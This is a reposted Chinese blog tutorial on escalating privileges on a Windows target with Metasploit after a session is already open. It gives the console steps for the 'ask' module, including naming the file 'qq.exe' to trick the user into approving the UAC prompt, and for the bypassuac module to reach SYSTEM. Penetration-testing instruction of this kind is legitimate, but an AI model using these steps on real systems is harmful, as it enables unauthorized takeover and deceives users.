首页 网络安全 漏洞挖掘 查看内容

「黑客技术」Msf提高程序运行权限级别提权

2020-2-11 15:23 |来自: 互联网 2360 0

摘要: 提权大致也就3种方法1. 提高程序运行权限级别2. Uac绕过3. 提权漏洞我这里先用第一种来演示前提是msf已经获取到了 一个sessionGetiud查看用户 是用户权限Getsystem报错 看到是没法提权的接下来 background退到后台 u ...
关键词: 权限 用户 session 模块 接下来 运行 靶机 bypassuac Getsystem

提权大致也就3种方法

1. 提高程序运行权限级别

2. Uac绕过

3. 提权漏洞


我这里先用第一种来演示

前提是msf已经获取到了 一个session


Getiud查看用户 是用户权限

Getsystem报错 看到是没法提权的

接下来 background退到后台

use exploit/windows/local/ask

加载模块

Show options

Set session 1

设置 session为 刚刚获取到得session

运行后会弹出 uac的拦截

Filename 可以设置文件的名字 伪装文件例如qq使得 用户点击确认

Set filename qq.Exe

接下来 run 运行 等待就可以了

接下来我们就可以看到靶机那边弹出用户控制的框

点击确定

在msf那边就可以获取到一个新的sesion

Getuid

还是用户权限

Getsystem

看到现在已经获取到了管理员权限


Msf绕过uac

use exploit/windows/local/bypassuac 再按几下tab键 可以看到绕过uac还是有很多模块和方法的 例如进程注入 vbs绕过等等

我这里直接用bypassuac模块

Show options

这里只需要设置个session就可以了


Set session 3

Run

执行成功

反弹回来一个session


Getuid

用户权限

Getsystem

Getuid

获取system权限成功

本文出处: https://www.toutiao.com/a6792068953574212108/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部